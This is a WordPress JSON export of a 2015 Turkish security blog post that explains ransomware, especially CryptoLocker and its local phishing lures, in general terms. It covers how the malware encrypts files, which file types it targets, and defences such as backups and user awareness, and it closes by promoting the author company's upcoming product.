{"id":470,"date":"2015-08-16T18:33:47","date_gmt":"2015-08-16T15:33:47","guid":{"rendered":"https:\/\/furkansandal.com\/trend-tehdit-fidye-yazilimlari-ransomware\/"},"modified":"2015-08-16T18:33:47","modified_gmt":"2015-08-16T15:33:47","slug":"trend-tehdit-fidye-yazilimlari-ransomware","status":"publish","type":"post","link":"https:\/\/furkansandal.com\/trend-tehdit-fidye-yazilimlari-ransomware\/","title":{"rendered":"Trend Tehdit: Fidye Yaz\u0131l\u0131mlar\u0131 \/ Ransomware"},"content":{"rendered":"

Ad\u0131n\u0131 neredeyse her mecrada duymaya ba\u015flad\u0131\u011f\u0131m\u0131z yeni bir kavram “Ransomware<\/b>“. Bu k\u0131sa makalede Ransomware<\/b> kavram\u0131n\u0131 ve hayat\u0131m\u0131za etkilerini ve alabilece\u011fimiz \u00f6nlemlere de\u011finmek istedik.<\/span>

<\/span>Ransomware nedir?<\/span><\/b><\/p>\n

Bu kavram k\u0131sa ve en temel anlam\u0131 ile “Fidye isteyen yaz\u0131l\u0131m<\/b>” olarak \u00f6zetlenebilir. En \u00e7ok ad\u0131n\u0131 duydu\u011fumuz ransomware “cryptolocker<\/b>“. Ancak bir \u00e7ok benzeri de var. Torrentlocker, bitlocker, TeslaCrypt, PGPLocker pek populer olmayan Crytolocker benzerleri. Ayr\u0131ca yerel olarak geli\u015ftirilmi\u015f benzerleri de var, \u00f6rne\u011fin Avustralya’da trafik kameralar\u0131ndan ceza kesildi\u011fine dair e-posta g\u00f6nderen benzeri, \u00fclkemizde s\u0131k\u00e7a kar\u015f\u0131la\u015ft\u0131\u011f\u0131m\u0131z TTnet, ard\u0131ndan Turkcell ve son olarak da PTT kargo ‘dan geldi\u011fini iddaa eden cryptolocker benzerleri mevcut.<\/span><\/div>\n


<\/span><\/b>Tarih\u00e7e;<\/span><\/b><\/p>\n

Esas\u0131nda 90’larda var olan ancak \u00e7ok populer olmayan bu sald\u0131r\u0131 metodu, Internet h\u0131zlar\u0131n\u0131n artmas\u0131 ve Internet’te d\u00f6nen bilginin nitelikli (para eden) bilgi olmas\u0131 ile gittik\u00e7e populer hale geldi ve son geldi\u011fi noktada “Ransomware<\/b>” yani fidye yaz\u0131l\u0131mlar\u0131 ortaya \u00e7\u0131kt\u0131. Ransomware’lerin daha ad\u0131 belli olmad\u0131\u011f\u0131 y\u0131llarda bu sald\u0131r\u0131y\u0131 “manuel” yani direkt olarak sald\u0131rgan\u0131n bizzat kendi ger\u00e7ekle\u015ftirdi\u011fi \u00e7ok say\u0131da ihbar ile kar\u015f\u0131la\u015fm\u0131\u015ft\u0131k. Bu ihbarlar genellikle mevcut bir yaz\u0131l\u0131m ya da i\u015fletim sistemi zafiyeti ile  sunucu ya da istemciye s\u0131zan sald\u0131rgan buldu\u011fu t\u00fcm dosyalar\u0131 (sql sunucu, MS office ya da benzeri) Truecrypt<\/b> ya da benzeri kriptolama uygulamalar\u0131 ile \u015fifreler ve kurbandan para isterdi. Bu sald\u0131r\u0131 genellikle kurban\u0131n \u00f6dedi\u011fi para kar\u015f\u0131l\u0131\u011f\u0131nda ald\u0131\u011f\u0131 \u015fifre ile sonu\u00e7lan\u0131rd\u0131. Ancak \u00e7o\u011fu zaman sald\u0131rgan ile ileti\u015fime ge\u00e7ilemedi\u011fi, buna ra\u011fmen b\u0131rak\u0131lan mesajda istenen bedelin yat\u0131r\u0131lmas\u0131na ra\u011fmen \u015fifrelenen dosyalara hi\u00e7 bir zaman ula\u015f\u0131lamad\u0131\u011f\u0131 senaryolar da olduk\u00e7a s\u0131k rastlad\u0131k.<\/span><\/div>\n


<\/span>Nas\u0131l \u00c7al\u0131\u015f\u0131r?<\/span><\/b><\/p>\n

Bu makalemiz teknik bir inceleme de\u011fil ancak ransomware’ler nas\u0131l \u00e7al\u0131\u015f\u0131r biraz de\u011finmemiz iyi olacak.<\/span><\/div>\n


<\/span><\/p>\n

\u00c7o\u011fu tehdit t\u00fcr\u00fcnde oldu\u011fu gibi Ransomware’ler de mail yolu ile kullan\u0131c\u0131lar\u0131 tuza\u011fa d\u00fc\u015f\u00fcrmeye \u00e7al\u0131\u015f\u0131yor. Ancak belirtmek gerekir ki g\u00f6rd\u00fc\u011f\u00fcm\u00fcz en ba\u015far\u0131l\u0131 mail i\u00e7eriklerinden birine sahip. B\u0131rak\u0131n son kullan\u0131c\u0131lar\u0131, \u00e7o\u011fu IT profesyonelleri<\/b> bile bu maili a\u00e7\u0131p, tuza\u011fa d\u00fc\u015febiliyor. A\u015fa\u011f\u0131daki ekran g\u00f6r\u00fcnt\u00fcs\u00fcnde taraf\u0131m\u0131za ula\u015fm\u0131\u015f bir ransomware (cryptolocker<\/b>) sald\u0131r\u0131s\u0131n\u0131 g\u00f6rebilirsiniz.<\/span><\/div>\n


<\/span><\/p>\n\n\n\n\n
<\/td>\n<\/tr>\n
Cryptolocker Sald\u0131r\u0131s\u0131 \u00d6rne\u011fi<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
<\/span>
<\/span><\/div>\n
\u00c7ok net olarak g\u00f6rece\u011finiz gibi, daha \u00f6nce geli\u015ftirilmi\u015f benzeri tehditlerden farkl\u0131 olarak son derece d\u00fczg\u00fcn T\u00fcrk\u00e7e kullan\u0131larak haz\u0131rlanm\u0131\u015f. Ayr\u0131ca e-posta’n\u0131n ula\u015ft\u0131\u011f\u0131 tarih ile i\u00e7erikte ge\u00e7en tarihin uyu\u015fmas\u0131, resmi duru\u015fu ile son derece ba\u015far\u0131l\u0131 bir oltalama sald\u0131r\u0131s\u0131.<\/span><\/div>\n
<\/div>\n
Ransomware’ler her versiyonunda farkl\u0131 bir \u015fekilde zararl\u0131 dosyay\u0131 kullan\u0131c\u0131ya bilgisayar\u0131na y\u00fcklemeye zorlar. Yukar\u0131daki \u00f6rnekte adres de\u011fi\u015fikli\u011fi formu doldurtarak zararl\u0131 yaz\u0131l\u0131m\u0131 \u00e7al\u0131\u015ft\u0131rmaya zorlamakta. Elbette adres de\u011fi\u015fikli\u011fi formu<\/b> bir .zip dosyas\u0131 ve bu dosya i\u00e7erisinde bir .exe bar\u0131nd\u0131r\u0131yor. <\/span><\/div>\n

<\/span><\/div>\n
Bu exe \u00e7al\u0131\u015ft\u0131r\u0131ld\u0131\u011f\u0131nda rastgele \u00fcretilmi\u015f bir URL’ye ba\u011flanarak (Command and control server) RSA Public Key<\/b>‘i download eder. Bu key ile her bir dosyay\u0131 encrypt edece\u011fi AES256 key’i \u00fcretir ve her dosyay\u0131 bu key ile \u015fifreler. Elbette bu key her bilgisayar i\u00e7in farkl\u0131 \u00fcretilir. B\u00f6ylelikle para transferi edilerek al\u0131nan bir \u015fifre her kurbanda kullan\u0131lamaz. Bu esnada bilgisayar\u0131n\u0131zdaki t\u00fcm dosyalar\u0131n \u015fifrelendi\u011fi ve \u00f6deme yap\u0131lmad\u0131\u011f\u0131 taktirde a\u00e7\u0131lamayaca\u011f\u0131 da Windows arka plan\u0131n\u0131z\u0131 de\u011fi\u015ftirerek bildirir. \u00d6deyi yapmak i\u00e7in 72 saat s\u00fcreniz bulunuyor. Bu s\u00fcre i\u00e7erisinde \u00f6demeyi ger\u00e7ekle\u015ftirmezseniz \u00f6demeniz gereken fiyat art\u0131yor.<\/span><\/div>\n

<\/span><\/div>\n
Hangi dosyalar\u0131m tehlikede?<\/span><\/b><\/div>\n
Bilgi \u00e7ok kullan\u0131lan ve i\u00e7erisinde \u015fahsi ya da kurumsal bilgileriniz olma ihtimali en y\u00fcksek olan uzant\u0131lar; ” .odt, *.ods, *.odp, *.odm, *.odc, *.odb, *.doc, *.docx, *.docm, *.wps, *.xls, *.xlsx, *.xlsm, *.xlsb, *.xlk, *.ppt, *.pptx, *.pptm, *.mdb, *.accdb, *.pst, *.dwg, *.dxf, *.dxg, *.wpd, *.rtf, *.wb2, *.mdf, *.dbf, *.psd, *.pdd, *.pdf, *.eps, *.ai, *.indd, *.cdr, *.jpg, *.jpe, *.jpg, *.dng, *.3fr, *.arw, *.srf, *.sr2, *.bay, *.crw, *.cr2, *.dcr, *.kdc, *.erf, *.mef, *.mrw, *.nef, *.nrw, *.orf, *.raf, *.raw, *.rwl, *.rw2, *.r3d, *.ptx, *.pef, *.srw, *.x3f, *.der, *.cer, *.crt, *.pem, *.pfx, *.p12, *.p7b, *.p7c  ” uzant\u0131l\u0131 dosyalar cryptolocker taraf\u0131ndan \u015fifreleniyor. Bu dosya say\u0131lar\u0131 her versiyonda azabilir, ya da artabilir.<\/span><\/span><\/div>\n

<\/span><\/div>\n
Kurban olursam ne yapaca\u011f\u0131m?<\/span><\/b><\/div>\n
E\u011fer bu sald\u0131r\u0131 ile kar\u015f\u0131la\u015ft\u0131ysan\u0131z ve art\u0131k kurban stat\u00fcs\u00fcnde iseniz iki se\u00e7iminiz var,<\/span><\/div>\n
a- Paray\u0131 \u00f6der<\/b>, \u015fifreyi al\u0131r<\/b>, hayat\u0131n\u0131za devam edebilirsiniz.<\/span><\/div>\n
b- Veri kayb\u0131n\u0131<\/b> g\u00f6ze al\u0131r, bilgisayar\u0131n\u0131z\u0131 formatlay\u0131p hayat\u0131n\u0131za devam edebilirsiniz.<\/span><\/div>\n

<\/span><\/div>\n
Hemen belirtelim, \u015fifrelenen bu dosyalar\u0131 decrypt etmek (\u015fifrelerini a\u00e7mak<\/b>) matematiksel olarak m\u00fcmk\u00fcn olsa da, y\u00fczy\u0131llar boyu s\u00fcrebilece\u011finden, pratikte m\u00fcmk\u00fcn de\u011fildir.<\/span><\/div>\n

<\/span><\/div>\n
Peki \u00f6deme yap\u0131p, bizden para isteyenleri tuza\u011fa d\u00fc\u015f\u00fcrsek? Maalesef bu da pek m\u00fcmk\u00fcn de\u011fil. Ransomware’lere yapaca\u011f\u0131n\u0131z \u00f6demeler bitcoin ile ger\u00e7ekle\u015fmekte bu \u00f6demeyi takip etmemiz imkans\u0131z hale gelmektedir. Cryptolocker’in ilk versiyonlar\u0131nda kulland\u0131\u011f\u0131 \u015fifreleme algoritmas\u0131n\u0131n zafiyeti nedeni ile dosyalara ula\u015f\u0131labiliyordu. Hatta baz\u0131 g\u00fcvenlik firmalar\u0131 \u00fccretsiz olarak decrypt hizmeti de veriyordu. Ancak cryptolocker’in bug\u00fcn geldi\u011fi durumda bu s\u00f6z konusu de\u011fil. Dosyalar\u0131n\u0131z\u0131 a\u00e7mak i\u00e7in size yard\u0131mc\u0131 olup para talep eden ki\u015filere itibar etmemenizde fayda var.<\/span><\/div>\n

<\/span><\/div>\n
Ransomware’lerden nas\u0131l korunabilirim?<\/span><\/b><\/div>\n
Ransomware’lerden korunmak i\u00e7in %100 g\u00fcvenli<\/b> bir teknik yol maalesef bulunmuyor. Her tehdit t\u00fcr\u00fcnde oldu\u011fu gibi, ransomware’lerde de fark\u0131ndal\u0131k ve bilin\u00e7lilik en \u00f6nemli silah. Ancak s\u0131k s\u0131k al\u0131nan backuplar ransomware sald\u0131r\u0131lar\u0131nda neredeyse s\u0131f\u0131r zarar g\u00f6r\u00fclmesini sa\u011flayabiliyor. G\u00fcnl\u00fck olarak \u00e7al\u0131\u015fan bir yedekleme prosed\u00fcr\u00fcn\u00fcz varsa dosyalar\u0131n\u0131z\u0131n \u015fifrelenmesini \u00f6nemsemezsiniz. Ancak Gdrive<\/b>, Dropbox<\/b> gibi i\u015fletim sisteminize mount edilmi\u015f bulut tabanl\u0131 \u00e7\u00f6z\u00fcmlerin de ransomware’ler taraf\u0131ndan istismar edilebildi\u011fini <\/b>unutmayal\u0131m.<\/span><\/div>\n

<\/span><\/div>\n
Bireysel \u00d6nlemler<\/span><\/b><\/div>\n
E\u011fer lisansl\u0131 bir antivirus yaz\u0131l\u0131m\u0131n\u0131z varsa bunu s\u0131k s\u0131k g\u00fcncelleme<\/b>yi ihmal etmeyin. Zero day olarak (Yani ilk \u00e7\u0131kt\u0131klar\u0131 g\u00fcn) yakalanmasalar da, her yeni \u00e7\u0131kan ransomware zararl\u0131 yaz\u0131l\u0131m\u0131n\u0131 antivirusler bir s\u00fcre sonra yakalayabilir. Bireysel \u00f6nlemlerin en \u00f6nemlisi fark\u0131ndal\u0131k. PTT’nin asla e-posta yolu ile bildirim<\/b> yapmad\u0131\u011f\u0131n\u0131, TTnet faturas\u0131<\/b> i\u00e7eren bir e-posta al\u0131rsan\u0131z  dikkatli davranmak tamamen bireyin almas\u0131 gereken bir \u00f6nlem.<\/span><\/div>\n

<\/span><\/div>\n
Kurumsal \u00d6nlemler<\/span><\/b><\/div>\n
Kurumsal tarafta i\u015fler biraz daha ciddi ve kar\u0131\u015f\u0131k.<\/span><\/div>\n
Firewall’larda bulunan web filtreleme sistemleri ise maalesef yetersiz kal\u0131yor. Indirilen .exe dosyan\u0131n eri\u015fmek istedi\u011fi URL’yi (Command and control center) bloklamak teoride bir \u00e7\u00f6z\u00fcm gibi duruyor ancak firewall’lar bir ka\u00e7 g\u00fcn, bazen bir ka\u00e7 haftada bu siteleri \u00f6\u011frenebiliyor. Dolay\u0131s\u0131 ile bir ka\u00e7 g\u00fcnde verebilece\u011fi t\u00fcm zarar\u0131 verebilen bu zararl\u0131lar i\u00e7in firewall ve web filtreler kesinlikle bir \u00e7\u00f6z\u00fcm olam\u0131yor. <\/span><\/div>\n

<\/span><\/div>\n
Hayli pahal\u0131 olan yabanc\u0131 \u00fcr\u00fcnlere \u00fclkemizde maalesef \u00e7ok s\u0131n\u0131rl\u0131 say\u0131da b\u00fcy\u00fck \u00e7apl\u0131 firma sahip olabiliyor. Bu \u00fcr\u00fcnlerinde de %100 ba\u015far\u0131l\u0131<\/b> olma garantisi asla yok.<\/span><\/div>\n

<\/span><\/div>\n
Her tehditin oldu\u011fu gibi ransomware’lerin de bir ge\u00e7erlilik s\u00fcresi olacakt\u0131r elbette, ancak bu s\u00fcre boyunca onlar\u0131 tan\u0131mal\u0131, \u00f6nlem almal\u0131, gerek son kullan\u0131c\u0131, gerekse kurumsal tarafta bu zararl\u0131lar\u0131n nas\u0131l \u00e7al\u0131\u015ft\u0131\u011f\u0131n\u0131 bilmeli ve durdurmak i\u00e7in yeni teknolojiler geli\u015ftirmeliyiz. <\/span><\/div>\n

<\/span><\/div>\n
ISR Bilgi G\u00fcvenli\u011fi<\/b> olarak ransomware ve benzeri tehditler konusunda \u00fclkemizde ve d\u00fcnyadaki eksi\u011fi uzun s\u00fcredir fark\u0131nday\u0131z ve bu konularda T\u00fcbitak – Martek b\u00fcnyesinde ar-ge \u00e7al\u0131\u015fmalar\u0131m\u0131z\u0131 t\u00fcm h\u0131z\u0131yla s\u00fcrd\u00fcr\u00fcyoruz. Nihayet bu \u00e7al\u0131\u015fmalar\u0131n meyveleri olu\u015fmaya ba\u015flad\u0131. Lansman\u0131n\u0131 k\u0131sa s\u00fcre i\u00e7erisinde ger\u00e7ekle\u015ftirece\u011fimiz \u00fcr\u00fcn\u00fcm\u00fcz, statik imza kullanan teknolojilerden (UTM, Firewall, IDS, IPS) olduk\u00e7a farkl\u0131 bir teknolojiye sahip olan, bu sald\u0131r\u0131lar\u0131 hen\u00fcz zero-day<\/b> halinde tespit edip durdurmaya odaklanm\u0131\u015f bir \u00fcr\u00fcn. Pilot \u00e7al\u0131\u015fmalar\u0131nda beklentilerimiz \u00fczerinde ba\u015far\u0131l\u0131 olan “\u00fcr\u00fcn\u00fcm\u00fcz\u00fcn” \u00e7ok k\u0131sa s\u00fcrede \u00fclkemizden yurtd\u0131\u015f\u0131na ihra\u00e7 edilen bir teknoloji olaca\u011f\u0131ndan endi\u015femiz yok.<\/span><\/div>\n

<\/span><\/div>\n
\u00dcr\u00fcn\u00fcm\u00fcz ile ilgili t\u00fcm geli\u015fmeleri www.isr.com.tr adresinden takip edebilirsiniz.<\/span><\/div>\n

\nFurkan SANDAL<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"

Ad\u0131n\u0131 neredeyse her mecrada duymaya ba\u015flad\u0131\u011f\u0131m\u0131z yeni bir kavram “Ransomware“. Bu k\u0131sa makalede Ransomware kavram\u0131n\u0131 ve hayat\u0131m\u0131za etkilerini ve alabilece\u011fimiz…<\/p>\n","protected":false},"author":1,"featured_media":471,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","footnotes":""},"categories":[6,1,9,10,7,4],"tags":[],"aioseo_notices":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/furkansandal.com\/wp-content\/uploads\/2015\/08\/Dark-Root.jpg?fit=1280%2C800&ssl=1","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p6BM7I-7A","amp_enabled":true,"_links":{"self":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts\/470"}],"collection":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/comments?post=470"}],"version-history":[{"count":0,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts\/470\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/media\/471"}],"wp:attachment":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/media?parent=470"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/categories?post=470"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/tags?post=470"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}